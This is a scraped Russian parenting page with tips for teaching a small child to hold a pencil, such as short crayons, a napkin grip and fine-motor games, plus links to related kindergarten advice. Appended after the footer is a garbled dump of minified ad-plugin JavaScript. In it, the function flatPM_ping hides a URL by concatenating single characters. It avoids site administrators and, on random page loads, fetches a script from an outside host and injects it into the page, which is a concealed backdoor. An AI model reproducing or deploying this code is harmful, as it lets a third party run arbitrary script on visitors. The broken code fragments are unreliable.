Если все перечисленные способы не принесли успеха, то уберите на некоторое время ВСЕ карандаши, фломастеры и другие изобразительные материалы большой длины. Купите коробку масляной пастели (она очень яркая и легко оставляет след на бумаге). Сломайте мелки пополам, так, чтобы получились кусочки сантиметра по три — не больше. Такие мелки невозможно держать в кулаке. То есть, держать-то можно, но рисовать так не получится. Такие кусочки можно держать только пальчиками — щепоточкой.

Порисуйте такими мелками недельку-другую (активно).

Малыш привыкнет держать предмет для рисования пальчиками. А потом пробуйте вернуться к карандашам. Обратите внимание ребенка на то, как он держал мелки и скажите, что так же можно держать и карандаш.

Если опять начнет держать в кулачке, вернитесь назад — только мелки. И порисуйте ими еще пару недель.

Обычно малыши очень крепко сжимают карандаш. Пальцы потеют и быстро устают. В этом случае нужно сделать упражнения на расслабление. Хорошо помогают научить ребенка расслаблять пальцы занятия с красками. Когда ребенок работает с кистью, то он расслабляет пальцы, делая широкие мазки.

Обратите особое внимание на то, как сидит ваш ребенок при рисовании.

Он должен знать правила:

придерживать бумагу рукой, свободной от рисования;

• локти не должны быть прижаты к телу и тем более не должны висеть.

Ну и конечно, развиваем мелкую моторику (шнуровки, перекладывание мелких предметов, наклейки и аппликации, пальчиковая гимнастика, рисование (пальчиками, мелками, палочками на песке и т. д.)

Развивайте пальчики малыша. Давайте малышу отщипывать пластилин, катать его между пальчиками и лепить на доску. Поиграйте «в Золушку» — смешайте разноцветные крупы и попросите ребенка рассортировать их по разным чашкам. Важно научить его напрягать и расслаблять пальцы, для этого полезны разнообразные пальчиковые игры типа игры «в замок».

Сделайте так, чтобы ребенку было интересно учиться. Приготовьте ему для занятий интересную раскраску с любимыми героями или красочную тетрадь для занятий.

Предлагаем вам небольшой, но любопытный эксперимент, который поможет вам в этом деле.

1. Возьмите салфетку и разделите ее пополам. Если взять целую, она будет слишком большой для маленькой детской ручки. Поэтому используем половину.

2. Нужно зажать салфетку безымянным пальцем и мизинцем. Посмотрите, как это сделано на фото ниже, и помогите ребенку сделать так же.

3. Затем попросите малыша взять остальными тремя пальцами ручку или карандаш. Напомните, что салфетка при этом должна оставаться зажатой в руке.

4. Удивительно, но пока салфетка зажата мизинцем и безымянным пальцем, ребенок преспокойным образом держит ручку или карандаш правильно.

Как научить ребенка говорить правильно положить маленькую игрушку и предложить малышу ее найти. Как научить годовалого ребенка говорить? После года лучше избегать языка жестов.

Как научить ребенка рисовать. Консультация для родителей. Как научить ребенка рисовать. Воспитатель: Т. М. Пугачевская МБДОУ №139 д/сад «Антошка»г. Брянск. Ваш ребенок.

Консультация для родителей «Как научить ребенка говорить красиво» Воспитатель: Дорман Елена Александровна. Не нервничайте, если ребенок говорит неправильно. Идет естественный и активный процесс.

Консультация для родителей «Как научить ребенка не обижать других» Когда малыши начинают ходить и встречаться со сверстниками в разных ситуациях, они могут обижать других детей без какого-либо злого умысла.

Консультация для родителей «Как научить ребенка постоять за себя» Консультация для родителей Тема: «Как научить ребенка постоять за себя» Этот вопрос волнует и мам, но пап, наверное, все-таки больше.

Консультация для родителей «Как научить ребенка счету» Консультация для родителей: Как научить ребенка счету Детей необходимо учить цифрам по двум важным причинам. Первая из них заключается.

Консультация для родителей «Как научить ребёнка правильно держать карандаш» Уважаемые родители, работая с детьми младшего дошкольного возрастая я заметила,что не все дети могут правильно держать карандаш и у меня.

Консультация для родителей «Как правильно научить ребенка ПДД» Консультация для родителей Родителям — как правильно научить ребенка ПДД Проанализировав дорожно-транспортные происшествия, в которых пострадали.

Консультация для родителей «Как научить ребенка различать цвета» Консультация для родителей на тему: «Как научить ребенка цветам». Подготовила воспитатель Карастилёва Л. Н. Многие родители знают, что ребенок.

Консультация для родителей «Как научить ребенка держать карандаш» Как научить ребенка держать карандаш. Письмо – важнейший навык человека, а от того, насколько правильно человек держит ручку, зависит и.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика